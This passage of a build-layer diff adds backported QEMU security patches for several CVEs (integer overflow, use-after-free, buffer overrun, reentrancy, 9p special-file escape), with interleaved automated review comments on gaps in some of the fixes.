+Subject: [PATCH] ui/cursor: fix integer overflow in cursor_alloc
+ (CVE-2021-4206)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Prevent potential integer overflow by limiting 'width' and 'height' to
+512x512. Also change 'datasize' type to size_t. Refer to security
+advisory https://starlabs.sg/advisories/22-4206/ for more information.
+
+Fixes: CVE-2021-4206
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20220407081712.345609-1-mcascell@redhat.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/fa892e9a
+CVE: CVE-2021-4206
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/display/qxl-render.c | 7 +++++++
+ hw/display/vmware_vga.c | 2 ++
+ ui/cursor.c | 8 +++++++-
+ 3 files changed, 16 insertions(+), 1 deletion(-)
+
+diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
+index 237ed293ba..ca217004bf 100644
+--- a/hw/display/qxl-render.c
++++ b/hw/display/qxl-render.c
+@@ -247,6 +247,13 @@ static QEMUCursor *qxl_cursor(PCIQXLDevice *qxl, QXLCursor *cursor,
+ size_t size;
+
+ c = cursor_alloc(cursor->header.width, cursor->header.height);
++
++ if (!c) {
++ qxl_set_guest_bug(qxl, "%s: cursor %ux%u alloc error", __func__,
++ cursor->header.width, cursor->header.height);
++ goto fail;
++ }
++
+ c->hot_x = cursor->header.hot_spot_x;
+ c->hot_y = cursor->header.hot_spot_y;
+ switch (cursor->header.type) {
+diff --git a/hw/display/vmware_vga.c b/hw/display/vmware_vga.c
+index 98c83474ad..45d06cbe25 100644
+--- a/hw/display/vmware_vga.c
++++ b/hw/display/vmware_vga.c
+@@ -515,6 +515,8 @@ static inline void vmsvga_cursor_define(struct vmsvga_state_s *s,
+ int i, pixels;
+
+ qc = cursor_alloc(c->width, c->height);
++ assert(qc != NULL);
++
+ qc->hot_x = c->hot_x;
+ qc->hot_y = c->hot_y;
+ switch (c->bpp) {
+diff --git a/ui/cursor.c b/ui/cursor.c
+index 1d62ddd4d0..835f0802f9 100644
+--- a/ui/cursor.c
++++ b/ui/cursor.c
+@@ -46,6 +46,8 @@ static QEMUCursor *cursor_parse_xpm(const char *xpm[])
+
+ /* parse pixel data */
+ c = cursor_alloc(width, height);
++ assert(c != NULL);
++
+ for (pixel = 0, y = 0; y < height; y++, line++) {
+ for (x = 0; x < height; x++, pixel++) {
+ idx = xpm[line][x];
+@@ -91,7 +93,11 @@ QEMUCursor *cursor_builtin_left_ptr(void)
+ QEMUCursor *cursor_alloc(int width, int height)
+ {
+ QEMUCursor *c;
+- int datasize = width * height * sizeof(uint32_t);
++ size_t datasize = width * height * sizeof(uint32_t);
++
++ if (width > 512 || height > 512) {
++ return NULL;
++ }
+
+ c = g_malloc0(sizeof(QEMUCursor) + datasize);
+ c->width = width;
+--
+GitLab
+
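Review bot: In `cursor_alloc()` the new check rejects only values above 512, so a negative `width` or `height` (both are `int`) still reaches `g_malloc0()`, and `width * height` is evaluated in `int` in the `datasize` initialiser before the check runs. I would reject negatives as well, `if (width < 0 || height < 0 || width > 512 || height > 512) return NULL;`, and compute the size only after the check as `datasize = (size_t)width * height * sizeof(uint32_t);`. The `assert(qc != NULL)` added in `vmsvga_cursor_define()` is safe only if the caller already bounds `c->width` and `c->height`, which is not visible in this hunk; otherwise a guest-supplied size would abort the process, and an error return like the one added to `qxl_cursor()` would be the better fit.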
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch
new file mode 100644
index 0000000000..8418246247
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch
@@ -0,0 +1,43 @@
+From 9569f5cb5b4bffa9d3ebc8ba7da1e03830a9a895 Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Thu, 7 Apr 2022 10:11:06 +0200
+Subject: [PATCH] display/qxl-render: fix race condition in qxl_cursor
+ (CVE-2021-4207)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Avoid fetching 'width' and 'height' a second time to prevent possible
+race condition. Refer to security advisory
+https://starlabs.sg/advisories/22-4207/ for more information.
+
+Fixes: CVE-2021-4207
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20220407081106.343235-1-mcascell@redhat.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/9569f5cb
+CVE: CVE-2021-4207
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/display/qxl-render.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
+index d28849b121..237ed293ba 100644
+--- a/hw/display/qxl-render.c
++++ b/hw/display/qxl-render.c
+@@ -266,7 +266,7 @@ static QEMUCursor *qxl_cursor(PCIQXLDevice *qxl, QXLCursor *cursor,
+ }
+ break;
+ case SPICE_CURSOR_TYPE_ALPHA:
+- size = sizeof(uint32_t) * cursor->header.width * cursor->header.height;
++ size = sizeof(uint32_t) * c->width * c->height;
+ qxl_unpack_chunks(c->data, size, qxl, &cursor->chunk, group_id);
+ if (qxl->debug > 2) {
+ cursor_print_ascii_art(c, "qxl/alpha");
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch
new file mode 100644
index 0000000000..6a7ce0e26c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch
@@ -0,0 +1,42 @@
+From 6c8fa961da5e60f574bb52fd3ad44b1e9e8ad4b8 Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Tue, 5 Jul 2022 22:05:43 +0200
+Subject: [PATCH] scsi/lsi53c895a: fix use-after-free in lsi_do_msgout
+ (CVE-2022-0216)
+
+Set current_req->req to NULL to prevent reusing a free'd buffer in case of
+repeated SCSI cancel requests. Thanks to Thomas Huth for suggesting the patch.
+
+Fixes: CVE-2022-0216
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/972
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Reviewed-by: Thomas Huth <thuth@redhat.com>
+Message-Id: <20220705200543.2366809-1-mcascell@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/6c8fa961da5e60f574bb52fd3ad44b1e9e8ad4b8
+CVE: CVE-2022-0216
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/lsi53c895a.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/hw/scsi/lsi53c895a.c b/hw/scsi/lsi53c895a.c
+index c8773f73f7..99ea42d49b 100644
+--- a/hw/scsi/lsi53c895a.c
++++ b/hw/scsi/lsi53c895a.c
+@@ -1028,8 +1028,9 @@ static void lsi_do_msgout(LSIState *s)
+ case 0x0d:
+ /* The ABORT TAG message clears the current I/O process only. */
+ trace_lsi_do_msgout_abort(current_tag);
+- if (current_req) {
++ if (current_req && current_req->req) {
+ scsi_req_cancel(current_req->req);
++ current_req->req = NULL;
+ }
+ lsi_disconnect(s);
+ break;
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch
new file mode 100644
index 0000000000..137906cd30
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch
@@ -0,0 +1,52 @@
+From 4367a20cc442c56b05611b4224de9a61908f9eac Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Mon, 11 Jul 2022 14:33:16 +0200
+Subject: [PATCH] scsi/lsi53c895a: really fix use-after-free in lsi_do_msgout
+ (CVE-2022-0216)
+
+Set current_req to NULL, not current_req->req, to prevent reusing a free'd
+buffer in case of repeated SCSI cancel requests. Also apply the fix to
+CLEAR QUEUE and BUS DEVICE RESET messages as well, since they also cancel
+the request.
+
+Thanks to Alexander Bulekov for providing a reproducer.
+
+Fixes: CVE-2022-0216
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/972
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20220711123316.421279-1-mcascell@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/4367a20cc4
+CVE: CVE-2022-0216
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/lsi53c895a.c | 3 +-
+ 1 files changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/hw/scsi/lsi53c895a.c b/hw/scsi/lsi53c895a.c
+index 99ea42d49b..ad5f5e5f39 100644
+--- a/hw/scsi/lsi53c895a.c
++++ b/hw/scsi/lsi53c895a.c
+@@ -1030,7 +1030,7 @@ static void lsi_do_msgout(LSIState *s)
+ trace_lsi_do_msgout_abort(current_tag);
+ if (current_req && current_req->req) {
+ scsi_req_cancel(current_req->req);
+- current_req->req = NULL;
++ current_req = NULL;
+ }
+ lsi_disconnect(s);
+ break;
+@@ -1056,6 +1056,7 @@ static void lsi_do_msgout(LSIState *s)
+ /* clear the current I/O process */
+ if (s->current) {
+ scsi_req_cancel(s->current->req);
++ current_req = NULL;
+ }
+
+ /* As the current implemented devices scsi_disk and scsi_generic
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch
new file mode 100644
index 0000000000..fc4d6cf3df
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch
@@ -0,0 +1,57 @@
+Backport of:
+
+From 8d1b247f3748ac4078524130c6d7ae42b6140aaf Mon Sep 17 00:00:00 2001
+From: Stefano Garzarella <sgarzare@redhat.com>
+Date: Mon, 28 Feb 2022 10:50:58 +0100
+Subject: [PATCH] vhost-vsock: detach the virqueue element in case of error
+
+In vhost_vsock_common_send_transport_reset(), if an element popped from
+the virtqueue is invalid, we should call virtqueue_detach_element() to
+detach it from the virtqueue before freeing its memory.
+
+Fixes: fc0b9b0e1c ("vhost-vsock: add virtio sockets device")
+Fixes: CVE-2022-26354
+Cc: qemu-stable@nongnu.org
+Reported-by: VictorV <vv474172261@gmail.com>
+Signed-off-by: Stefano Garzarella <sgarzare@redhat.com>
+Message-Id: <20220228095058.27899-1-sgarzare@redhat.com>
+Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
+Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+
+CVE: CVE-2022-26354
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2022-26354.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/8d1b247f3748ac4078524130c6d7ae42b6140aaf ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/virtio/vhost-vsock-common.c | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+--- a/hw/virtio/vhost-vsock.c
++++ b/hw/virtio/vhost-vsock.c
+@@ -221,19 +221,23 @@ static void vhost_vsock_send_transport_r
+ if (elem->out_num) {
+ error_report("invalid vhost-vsock event virtqueue element with "
+ "out buffers");
+- goto out;
++ goto err;
+ }
+
+ if (iov_from_buf(elem->in_sg, elem->in_num, 0,
+ &event, sizeof(event)) != sizeof(event)) {
+ error_report("vhost-vsock event virtqueue element is too short");
+- goto out;
++ goto err;
+ }
+
+ virtqueue_push(vq, elem, sizeof(event));
+ virtio_notify(VIRTIO_DEVICE(vsock), vq);
+
+-out:
++ g_free(elem);
++ return;
++
++err:
++ virtqueue_detach_element(vq, elem, 0);
+ g_free(elem);
+ }
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch
new file mode 100644
index 0000000000..4196ebcf98
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch
@@ -0,0 +1,53 @@
+From 09a07b5b39c87423df9e8f6574c19a14d36beac5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 27 Jul 2022 10:34:12 +0530
+Subject: [PATCH] CVE-2022-35414
+
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/418ade7849ce7641c0f7333718caf5091a02fd4c]
+CVE: CVE-2022-35414
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ exec.c | 13 ++++++++++++-
+ 1 file changed, 12 insertions(+), 1 deletion(-)
+
+diff --git a/exec.c b/exec.c
+index 43c70ffb..2d6add46 100644
+--- a/exec.c
++++ b/exec.c
+@@ -685,7 +685,7 @@ static void tcg_iommu_free_notifier_list(CPUState *cpu)
+
+ /* Called from RCU critical section */
+ MemoryRegionSection *
+-address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
++address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr orig_addr,
+ hwaddr *xlat, hwaddr *plen,
+ MemTxAttrs attrs, int *prot)
+ {
+@@ -694,6 +694,7 @@ address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
+ IOMMUMemoryRegionClass *imrc;
+ IOMMUTLBEntry iotlb;
+ int iommu_idx;
++ hwaddr addr = orig_addr;
+ AddressSpaceDispatch *d = atomic_rcu_read(&cpu->cpu_ases[asidx].memory_dispatch);
+
+ for (;;) {
+@@ -737,6 +738,16 @@ address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
+ return section;
+
+ translate_fail:
++ /*
++ * We should be given a page-aligned address -- certainly
++ * tlb_set_page_with_attrs() does so. The page offset of xlat
++ * is used to index sections[], and PHYS_SECTION_UNASSIGNED = 0.
++ * The page portion of xlat will be logged by memory_region_access_valid()
++ * when this memory access is rejected, so use the original untranslated
++ * physical address.
++ */
++ assert((orig_addr & ~TARGET_PAGE_MASK) == 0);
++ *xlat = orig_addr;
+ return &d->map.sections[PHYS_SECTION_UNASSIGNED];
+ }
+ #endif
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch
new file mode 100644
index 0000000000..3f0d5fbd5c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch
@@ -0,0 +1,103 @@
+From 6dbbf055148c6f1b7d8a3251a65bd6f3d1e1f622 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@linaro.org>
+Date: Mon, 28 Nov 2022 21:27:40 +0100
+Subject: [PATCH] hw/display/qxl: Avoid buffer overrun in qxl_phys2virt
+ (CVE-2022-4144)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Have qxl_get_check_slot_offset() return false if the requested
+buffer size does not fit within the slot memory region.
+
+Similarly qxl_phys2virt() now returns NULL in such case, and
+qxl_dirty_one_surface() aborts.
+
+This avoids buffer overrun in the host pointer returned by
+memory_region_get_ram_ptr().
+
+Fixes: CVE-2022-4144 (out-of-bounds read)
+Reported-by: Wenxu Yin (@awxylitol)
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1336
+
+Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
+Message-Id: <20221128202741.4945-5-philmd@linaro.org>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/6dbbf055148c6f1b7d8a3251a65bd6f3d1e1f622]
+CVE: CVE-2022-4144
+Comments: Deleted patch hunk in qxl.h,as it contains change
+in comments which is not present in current version of qemu.
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ hw/display/qxl.c | 27 +++++++++++++++++++++++----
+ 1 file changed, 23 insertions(+), 4 deletions(-)
+
+diff --git a/hw/display/qxl.c b/hw/display/qxl.c
+index cd7eb39d..6bc8385b 100644
+--- a/hw/display/qxl.c
++++ b/hw/display/qxl.c
+@@ -1440,11 +1440,13 @@ static void qxl_reset_surfaces(PCIQXLDevice *d)
+
+ /* can be also called from spice server thread context */
+ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+- uint32_t *s, uint64_t *o)
++ uint32_t *s, uint64_t *o,
++ size_t size_requested)
+ {
+ uint64_t phys = le64_to_cpu(pqxl);
+ uint32_t slot = (phys >> (64 - 8)) & 0xff;
+ uint64_t offset = phys & 0xffffffffffff;
++ uint64_t size_available;
+
+ if (slot >= NUM_MEMSLOTS) {
+ qxl_set_guest_bug(qxl, "slot too large %d >= %d", slot,
+@@ -1468,6 +1470,23 @@ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+ slot, offset, qxl->guest_slots[slot].size);
+ return false;
+ }
++ size_available = memory_region_size(qxl->guest_slots[slot].mr);
++ if (qxl->guest_slots[slot].offset + offset >= size_available) {
++ qxl_set_guest_bug(qxl,
++ "slot %d offset %"PRIu64" > region size %"PRIu64"\n",
++ slot, qxl->guest_slots[slot].offset + offset,
++ size_available);
++ return false;
++ }
++ size_available -= qxl->guest_slots[slot].offset + offset;
++ if (size_requested > size_available) {
++ qxl_set_guest_bug(qxl,
++ "slot %d offset %"PRIu64" size %zu: "
++ "overrun by %"PRIu64" bytes\n",
++ slot, offset, size_requested,
++ size_requested - size_available);
++ return false;
++ }
+
+ *s = slot;
+ *o = offset;
+@@ -1486,7 +1505,7 @@ void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id)
+ offset = le64_to_cpu(pqxl) & 0xffffffffffff;
+ return (void *)(intptr_t)offset;
+ case MEMSLOT_GROUP_GUEST:
+- if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset)) {
++ if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size)) {
+ return NULL;
+ }
+ ptr = memory_region_get_ram_ptr(qxl->guest_slots[slot].mr);
+@@ -1944,9 +1963,9 @@ static void qxl_dirty_one_surface(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+ uint32_t slot;
+ bool rc;
+
+- rc = qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset);
+- assert(rc == true);
+ size = (uint64_t)height * abs(stride);
++ rc = qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size);
++ assert(rc == true);
+ trace_qxl_surfaces_dirty(qxl->id, offset, size);
+ qxl_set_dirty(qxl->guest_slots[slot].mr,
+ qxl->guest_slots[slot].offset + offset,
+--
+2.25.1
+
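Review bot: The `qxl_phys2virt()` hunk passes `size` to `qxl_get_check_slot_offset()`, but the hunk header still shows the three-argument signature `qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id)` and no `size` is declared in the visible lines. The Message-Id suggests this was the fifth patch of an upstream series, so an earlier patch that adds a `size_t size` parameter to `qxl_phys2virt()` and its callers is presumably required. Unless that prerequisite is applied before this file in the recipe, the build fails or the bounds check receives an unrelated value. The patch header should name the dependency next to the existing `Comments:` line, for example `Comments: requires the qxl_phys2virt() size-parameter backport to be applied first`. Both functions continue outside the hunks shown.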
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch
new file mode 100644
index 0000000000..26e22b4c31
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch
@@ -0,0 +1,77 @@
+[Ubuntu note: remove fuzz-lsi53c895a-test.c changes since the file does not
+ exist for this release]
+From b987718bbb1d0eabf95499b976212dd5f0120d75 Mon Sep 17 00:00:00 2001
+From: Thomas Huth <thuth@redhat.com>
+Date: Mon, 22 May 2023 11:10:11 +0200
+Subject: [PATCH] hw/scsi/lsi53c895a: Fix reentrancy issues in the LSI
+ controller (CVE-2023-0330)
+
+We cannot use the generic reentrancy guard in the LSI code, so
+we have to manually prevent endless reentrancy here. The problematic
+lsi_execute_script() function has already a way to detect whether
+too many instructions have been executed - we just have to slightly
+change the logic here that it also takes into account if the function
+has been called too often in a reentrant way.
+
+The code in fuzz-lsi53c895a-test.c has been taken from an earlier
+patch by Mauro Matteo Cascella.
+
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1563
+Message-Id: <20230522091011.1082574-1-thuth@redhat.com>
+Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
+Reviewed-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Thomas Huth <thuth@redhat.com>
+
+Reference: https://launchpad.net/ubuntu/+source/qemu/1:4.2-3ubuntu6.27
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2023-0330.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/qemu-project/qemu/-/commit/b987718bbb1d0eabf95499b976212dd5f0120d75]
+CVE: CVE-2023-0330
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/scsi/lsi53c895a.c | 23 +++++++++++++++------
+ tests/qtest/fuzz-lsi53c895a-test.c | 33 ++++++++++++++++++++++++++++++
+ 2 files changed, 50 insertions(+), 6 deletions(-)
+
+--- qemu-4.2.orig/hw/scsi/lsi53c895a.c
++++ qemu-4.2/hw/scsi/lsi53c895a.c
+@@ -1135,15 +1135,24 @@ static void lsi_execute_script(LSIState
+ uint32_t addr, addr_high;
+ int opcode;
+ int insn_processed = 0;
++ static int reentrancy_level;
++
++ reentrancy_level++;
+
+ s->istat1 |= LSI_ISTAT1_SRUN;
+ again:
+- if (++insn_processed > LSI_MAX_INSN) {
+- /* Some windows drivers make the device spin waiting for a memory
+- location to change. If we have been executed a lot of code then
+- assume this is the case and force an unexpected device disconnect.
+- This is apparently sufficient to beat the drivers into submission.
+- */
++ /*
++ * Some windows drivers make the device spin waiting for a memory location
++ * to change. If we have executed more than LSI_MAX_INSN instructions then
++ * assume this is the case and force an unexpected device disconnect. This
++ * is apparently sufficient to beat the drivers into submission.
++ *
++ * Another issue (CVE-2023-0330) can occur if the script is programmed to
++ * trigger itself again and again. Avoid this problem by stopping after
++ * being called multiple times in a reentrant way (8 is an arbitrary value
++ * which should be enough for all valid use cases).
++ */
++ if (++insn_processed > LSI_MAX_INSN || reentrancy_level > 8) {
+ if (!(s->sien0 & LSI_SIST0_UDC)) {
+ qemu_log_mask(LOG_GUEST_ERROR,
+ "lsi_scsi: inf. loop with UDC masked");
+@@ -1597,6 +1606,8 @@ again:
+ }
+ }
+ trace_lsi_execute_script_stop();
++
++ reentrancy_level--;
+ }
+
+ static uint8_t lsi_reg_readb(LSIState *s, int offset)
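Review bot: `reentrancy_level` is a function-level `static int`, so the counter is shared by every LSI controller in the process rather than kept per `LSIState`, and it is decremented only at the single exit shown after `trace_lsi_execute_script_stop()`. If any path in the part of `lsi_execute_script()` outside this hunk returns early, the counter is never restored, and once it exceeds 8 every later script run on any controller takes the forced-disconnect branch. It is worth confirming that the 4.2 body has no early `return`, and documenting the constraint on the declaration, e.g. `/* shared by all LSI instances; must be decremented on every exit path */`.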
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch
new file mode 100644
index 0000000000..70b7d6c562
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch
@@ -0,0 +1,178 @@
+From f6b0de53fb87ddefed348a39284c8e2f28dc4eda Mon Sep 17 00:00:00 2001
+From: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Date: Wed, 7 Jun 2023 18:29:33 +0200
+Subject: [PATCH] 9pfs: prevent opening special files (CVE-2023-2861)
+
+The 9p protocol does not specifically define how server shall behave when
+client tries to open a special file, however from security POV it does
+make sense for 9p server to prohibit opening any special file on host side
+in general. A sane Linux 9p client for instance would never attempt to
+open a special file on host side, it would always handle those exclusively
+on its guest side. A malicious client however could potentially escape
+from the exported 9p tree by creating and opening a device file on host
+side.
+
+With QEMU this could only be exploited in the following unsafe setups:
+
+ - Running QEMU binary as root AND 9p 'local' fs driver AND 'passthrough'
+ security model.
+
+or
+
+ - Using 9p 'proxy' fs driver (which is running its helper daemon as
+ root).
+
+These setups were already discouraged for safety reasons before,
+however for obvious reasons we are now tightening behaviour on this.
+
+Fixes: CVE-2023-2861
+Reported-by: Yanwu Shen <ywsPlz@gmail.com>
+Reported-by: Jietao Xiao <shawtao1125@gmail.com>
+Reported-by: Jinku Li <jkli@xidian.edu.cn>
+Reported-by: Wenbo Shen <shenwenbo@zju.edu.cn>
+Signed-off-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Reviewed-by: Greg Kurz <groug@kaod.org>
+Reviewed-by: Michael Tokarev <mjt@tls.msk.ru>
+Message-Id: <E1q6w7r-0000Q0-NM@lizzy.crudebyte.com>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/f6b0de53fb87ddefed348a39284c8e2f28dc4eda]
+CVE: CVE-2023-2861
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ fsdev/virtfs-proxy-helper.c | 27 +++++++++++++++++++++++--
+ hw/9pfs/9p-util.h | 40 +++++++++++++++++++++++++++++++++++++
+ 2 files changed, 65 insertions(+), 2 deletions(-)
+
+diff --git a/fsdev/virtfs-proxy-helper.c b/fsdev/virtfs-proxy-helper.c
+index 6f132c5f..300c9765 100644
+--- a/fsdev/virtfs-proxy-helper.c
++++ b/fsdev/virtfs-proxy-helper.c
+@@ -26,6 +26,7 @@
+ #include "qemu/xattr.h"
+ #include "9p-iov-marshal.h"
+ #include "hw/9pfs/9p-proxy.h"
++#include "hw/9pfs/9p-util.h"
+ #include "fsdev/9p-iov-marshal.h"
+
+ #define PROGNAME "virtfs-proxy-helper"
+@@ -350,6 +351,28 @@ static void resetugid(int suid, int sgid)
+ }
+ }
+
++/*
++ * Open regular file or directory. Attempts to open any special file are
++ * rejected.
++ *
++ * returns file descriptor or -1 on error
++ */
++static int open_regular(const char *pathname, int flags, mode_t mode)
++{
++ int fd;
++
++ fd = open(pathname, flags, mode);
++ if (fd < 0) {
++ return fd;
++ }
++
++ if (close_if_special_file(fd) < 0) {
++ return -1;
++ }
++
++ return fd;
++}
++
+ /*
+ * send response in two parts
+ * 1) ProxyHeader
+@@ -694,7 +717,7 @@ static int do_create(struct iovec *iovec)
+ if (ret < 0) {
+ goto unmarshal_err_out;
+ }
+- ret = open(path.data, flags, mode);
++ ret = open_regular(path.data, flags, mode);
+ if (ret < 0) {
+ ret = -errno;
+ }
+@@ -719,7 +742,7 @@ static int do_open(struct iovec *iovec)
+ if (ret < 0) {
+ goto err_out;
+ }
+- ret = open(path.data, flags);
++ ret = open_regular(path.data, flags, 0);
+ if (ret < 0) {
+ ret = -errno;
+ }
+diff --git a/hw/9pfs/9p-util.h b/hw/9pfs/9p-util.h
+index 546f46dc..79fdd2a3 100644
+--- a/hw/9pfs/9p-util.h
++++ b/hw/9pfs/9p-util.h
+@@ -13,12 +13,16 @@
+ #ifndef QEMU_9P_UTIL_H
+ #define QEMU_9P_UTIL_H
+
++#include "qemu/error-report.h"
++
+ #ifdef O_PATH
+ #define O_PATH_9P_UTIL O_PATH
+ #else
+ #define O_PATH_9P_UTIL 0
+ #endif
+
++#define qemu_fstat fstat
++
+ static inline void close_preserve_errno(int fd)
+ {
+ int serrno = errno;
+@@ -26,6 +30,38 @@ static inline void close_preserve_errno(int fd)
+ errno = serrno;
+ }
+
++/**
++ * close_if_special_file() - Close @fd if neither regular file nor directory.
++ *
++ * @fd: file descriptor of open file
++ * Return: 0 on regular file or directory, -1 otherwise
++ *
++ * CVE-2023-2861: Prohibit opening any special file directly on host
++ * (especially device files), as a compromised client could potentially gain
++ * access outside exported tree under certain, unsafe setups. We expect
++ * client to handle I/O on special files exclusively on guest side.
++ */
++static inline int close_if_special_file(int fd)
++{
++ struct stat stbuf;
++
++ if (qemu_fstat(fd, &stbuf) < 0) {
++ close_preserve_errno(fd);
++ return -1;
++ }
++ if (!S_ISREG(stbuf.st_mode) && !S_ISDIR(stbuf.st_mode)) {
++ error_report_once(
++ "9p: broken or compromised client detected; attempt to open "
++ "special file (i.e. neither regular file, nor directory)"
++ );
++ close(fd);
++ errno = ENXIO;
++ return -1;
++ }
++
++ return 0;
++}
++
+ static inline int openat_dir(int dirfd, const char *name)
+ {
+ return openat(dirfd, name,
+@@ -56,6 +92,10 @@ again:
+ return -1;
+ }
+
++ if (close_if_special_file(fd) < 0) {
++ return -1;
++ }
++
+ serrno = errno;
+ /* O_NONBLOCK was only needed to open the file. Let's drop it. We don't
+ * do that with O_PATH since fcntl(F_SETFL) isn't supported, and openat()
+--
+2.25.1
